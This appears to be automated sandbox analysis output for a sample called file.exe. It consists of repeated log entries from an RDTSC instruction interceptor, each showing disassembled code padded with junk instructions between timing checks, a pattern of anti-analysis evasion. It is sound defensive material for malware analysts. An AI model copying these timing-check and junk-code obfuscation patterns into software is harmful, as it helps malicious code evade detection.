Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66E4E second address: B66E92 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE8C51D4DCh 0x00000008 jno 00007FDE8C51D4EEh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FDE8C51D4E8h 0x00000018 jmp 00007FDE8C51D4DCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66E92 second address: B66E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68D6C second address: B68D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FDE8C51D4D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68D76 second address: B68D80 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE8CE8B4C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68D80 second address: B68D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FDE8C51D4D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68D90 second address: B68D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68D94 second address: B68DB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007FDE8C51D4DBh 0x00000010 pop edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68DB1 second address: B68DBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7E4CB second address: A7E4F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FDE8C51D4E7h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FDE8C51D4D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7E68D second address: A7E6AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE8CE8B4D8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C8035F second address: 4C803DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 22h 0x0000000d call 00007FDE8C51D4E9h 0x00000012 pop eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FDE8C51D4E9h 0x0000001d xor ecx, 64F9D096h 0x00000023 jmp 00007FDE8C51D4E1h 0x00000028 popfd 0x00000029 mov si, D107h 0x0000002d popad 0x0000002e mov edx, dword ptr [ebp+0Ch] 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov edi, 682B8D2Ah 0x00000039 mov di, 51F6h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C803DD second address: 4C803E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C803E3 second address: 4C803E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C803E7 second address: 4C80405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDE8CE8B4D1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80405 second address: 4C8040B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0396 second address: 4CB039C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB039C second address: 4CB03E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE8C51D4E0h 0x00000009 sbb si, 20E8h 0x0000000e jmp 00007FDE8C51D4DBh 0x00000013 popfd 0x00000014 movzx eax, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FDE8C51D4E7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB03E1 second address: 4CB03F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB03F9 second address: 4CB046B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FDE8C51D4DDh 0x00000012 jmp 00007FDE8C51D4DBh 0x00000017 popfd 0x00000018 pushad 0x00000019 mov dx, si 0x0000001c mov ah, EBh 0x0000001e popad 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007FDE8C51D4DDh 0x00000027 xchg eax, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FDE8C51D4DFh 0x00000031 or esi, 5F91B8FEh 0x00000037 jmp 00007FDE8C51D4E9h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB046B second address: 4CB049E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDE8CE8B4D7h 0x00000008 mov ah, 69h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDE8CE8B4D1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB049E second address: 4CB04A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB04A4 second address: 4CB04A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB04A8 second address: 4CB04D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007FDE8C51D4DFh 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDE8C51D4E5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB04D8 second address: 4CB050C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 call 00007FDE8CE8B4D3h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDE8CE8B4D5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB050C second address: 4CB0595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FDE8C51D4DEh 0x0000000f lea eax, dword ptr [ebp-04h] 0x00000012 pushad 0x00000013 push ecx 0x00000014 pushfd 0x00000015 jmp 00007FDE8C51D4DDh 0x0000001a add ax, 9CC6h 0x0000001f jmp 00007FDE8C51D4E1h 0x00000024 popfd 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushfd 0x00000029 jmp 00007FDE8C51D4E7h 0x0000002e xor ecx, 4B3DA3FEh 0x00000034 jmp 00007FDE8C51D4E9h 0x00000039 popfd 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0595 second address: 4CB05C0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDE8CE8B4D0h 0x00000008 xor cl, FFFFFFF8h 0x0000000b jmp 00007FDE8CE8B4CBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 nop 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov ch, 3Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB05C0 second address: 4CB066B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FDE8C51D4E3h 0x0000000c sub si, 136Eh 0x00000011 jmp 00007FDE8C51D4E9h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FDE8C51D4E7h 0x00000020 sbb cx, 197Eh 0x00000025 jmp 00007FDE8C51D4E9h 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007FDE8C51D4E0h 0x00000031 add si, 2478h 0x00000036 jmp 00007FDE8C51D4DBh 0x0000003b popfd 0x0000003c popad 0x0000003d nop 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FDE8C51D4E0h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB066B second address: 4CB0671 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0671 second address: 4CB06A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, A5h 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f call 00007FDE8C51D4DEh 0x00000014 mov edx, esi 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 call 00007FDE8C51D4DDh 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB06D0 second address: 4CB06E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4D2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0748 second address: 4CB0757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0757 second address: 4CB078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE8CE8B4CFh 0x00000009 adc ax, 99DEh 0x0000000e jmp 00007FDE8CE8B4D9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB078B second address: 4CB07DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop esi 0x00000008 pushad 0x00000009 pushad 0x0000000a mov cx, A19Fh 0x0000000e jmp 00007FDE8C51D4E4h 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FDE8C51D4E2h 0x0000001a jmp 00007FDE8C51D4E5h 0x0000001f popfd 0x00000020 popad 0x00000021 leave 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB07DF second address: 4CB07F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB07F2 second address: 4CB07F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB07F8 second address: 4CB07FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB07FC second address: 4CB0800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0800 second address: 4CA0206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c cmp eax, 00000000h 0x0000000f setne al 0x00000012 xor ebx, ebx 0x00000014 test al, 01h 0x00000016 jne 00007FDE8CE8B4C7h 0x00000018 xor eax, eax 0x0000001a sub esp, 08h 0x0000001d mov dword ptr [esp], 00000000h 0x00000024 mov dword ptr [esp+04h], 00000000h 0x0000002c call 00007FDE91284A87h 0x00000031 mov edi, edi 0x00000033 pushad 0x00000034 call 00007FDE8CE8B4D1h 0x00000039 pushfd 0x0000003a jmp 00007FDE8CE8B4D0h 0x0000003f jmp 00007FDE8CE8B4D5h 0x00000044 popfd 0x00000045 pop esi 0x00000046 mov edx, 35E87264h 0x0000004b popad 0x0000004c push ebx 0x0000004d pushad 0x0000004e mov edx, eax 0x00000050 push esi 0x00000051 pushfd 0x00000052 jmp 00007FDE8CE8B4D1h 0x00000057 adc eax, 4E0F7556h 0x0000005d jmp 00007FDE8CE8B4D1h 0x00000062 popfd 0x00000063 pop eax 0x00000064 popad 0x00000065 mov dword ptr [esp], ebp 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FDE8CE8B4CAh 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0206 second address: 4CA0218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8C51D4DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0218 second address: 4CA0244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e jmp 00007FDE8CE8B4D4h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0244 second address: 4CA0248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0248 second address: 4CA0319 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push FFFFFFFEh 0x00000009 jmp 00007FDE8CE8B4D8h 0x0000000e call 00007FDE8CE8B4C9h 0x00000013 pushad 0x00000014 mov cx, 36BDh 0x00000018 movzx eax, dx 0x0000001b popad 0x0000001c push eax 0x0000001d jmp 00007FDE8CE8B4D4h 0x00000022 mov eax, dword ptr [esp+04h] 0x00000026 pushad 0x00000027 movsx edx, ax 0x0000002a call 00007FDE8CE8B4CAh 0x0000002f pop eax 0x00000030 popad 0x00000031 mov eax, dword ptr [eax] 0x00000033 jmp 00007FDE8CE8B4CCh 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c pushad 0x0000003d mov bx, 9ED4h 0x00000041 pushfd 0x00000042 jmp 00007FDE8CE8B4CDh 0x00000047 adc ecx, 2B838D96h 0x0000004d jmp 00007FDE8CE8B4D1h 0x00000052 popfd 0x00000053 popad 0x00000054 pop eax 0x00000055 pushad 0x00000056 mov bx, cx 0x00000059 mov di, cx 0x0000005c popad 0x0000005d push 2E8BCC65h 0x00000062 jmp 00007FDE8CE8B4CBh 0x00000067 xor dword ptr [esp], 5849E715h 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FDE8CE8B4D5h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0319 second address: 4CA0366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE8C51D4E7h 0x00000009 add esi, 32D654DEh 0x0000000f jmp 00007FDE8C51D4E9h 0x00000014 popfd 0x00000015 movzx ecx, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr fs:[00000000h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0366 second address: 4CA036A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA036A second address: 4CA036E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA036E second address: 4CA0374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0374 second address: 4CA0382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8C51D4DAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0382 second address: 4CA03A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDE8CE8B4D3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03A0 second address: 4CA03A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03A6 second address: 4CA03AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03AA second address: 4CA03AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03AE second address: 4CA03DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FDE8CE8B4D7h 0x00000010 sub esp, 18h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ch, dh 0x00000018 mov eax, 3D5496E3h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03DE second address: 4CA03F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8C51D4E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03F6 second address: 4CA0450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FDE8CE8B4D6h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FDE8CE8B4D1h 0x00000019 sbb esi, 130059F6h 0x0000001f jmp 00007FDE8CE8B4D1h 0x00000024 popfd 0x00000025 push eax 0x00000026 push edx 0x00000027 mov ax, A13Dh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0450 second address: 4CA0489 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 111B1439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b jmp 00007FDE8C51D4E4h 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDE8C51D4E7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0489 second address: 4CA055C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007FDE8CE8B4CBh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FDE8CE8B4D4h 0x00000016 xor ah, 00000008h 0x00000019 jmp 00007FDE8CE8B4CBh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FDE8CE8B4D8h 0x00000025 and esi, 4CBF7968h 0x0000002b jmp 00007FDE8CE8B4CBh 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, esi 0x00000033 jmp 00007FDE8CE8B4D6h 0x00000038 xchg eax, edi 0x00000039 jmp 00007FDE8CE8B4D0h 0x0000003e push eax 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007FDE8CE8B4D1h 0x00000046 xor esi, 7244B4E6h 0x0000004c jmp 00007FDE8CE8B4D1h 0x00000051 popfd 0x00000052 jmp 00007FDE8CE8B4D0h 0x00000057 popad 0x00000058 xchg eax, edi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA055C second address: 4CA0561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0561 second address: 4CA05AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76C84538h] 0x0000000e jmp 00007FDE8CE8B4D0h 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 jmp 00007FDE8CE8B4D0h 0x0000001b xor eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA05AB second address: 4CA05AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA05AF second address: 4CA05B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA05B5 second address: 4CA05BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA05BC second address: 4CA0600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebp 0x00000008 jmp 00007FDE8CE8B4D8h 0x0000000d mov dword ptr [esp], eax 0x00000010 jmp 00007FDE8CE8B4D0h 0x00000015 lea eax, dword ptr [ebp-10h] 0x00000018 pushad 0x00000019 pushad 0x0000001a mov di, ax 0x0000001d mov ax, 187Fh 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0722 second address: 4CA0726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0726 second address: 4CA072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA072C second address: 4CA074B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, D650h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C903E0 second address: 4C903EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C903EF second address: 4C904B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDE8C51D4DFh 0x00000008 pop ecx 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FDE8C51D4E0h 0x00000015 push eax 0x00000016 pushad 0x00000017 movsx edi, cx 0x0000001a pushfd 0x0000001b jmp 00007FDE8C51D4DAh 0x00000020 sbb cx, 9A58h 0x00000025 jmp 00007FDE8C51D4DBh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FDE8C51D4DBh 0x00000034 or esi, 6251C11Eh 0x0000003a jmp 00007FDE8C51D4E9h 0x0000003f popfd 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 jmp 00007FDE8C51D4DEh 0x00000048 sub esp, 2Ch 0x0000004b pushad 0x0000004c movzx eax, dx 0x0000004f push edi 0x00000050 pushfd 0x00000051 jmp 00007FDE8C51D4E6h 0x00000056 sbb esi, 29524978h 0x0000005c jmp 00007FDE8C51D4DBh 0x00000061 popfd 0x00000062 pop eax 0x00000063 popad 0x00000064 push ebp 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C904B4 second address: 4C904BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
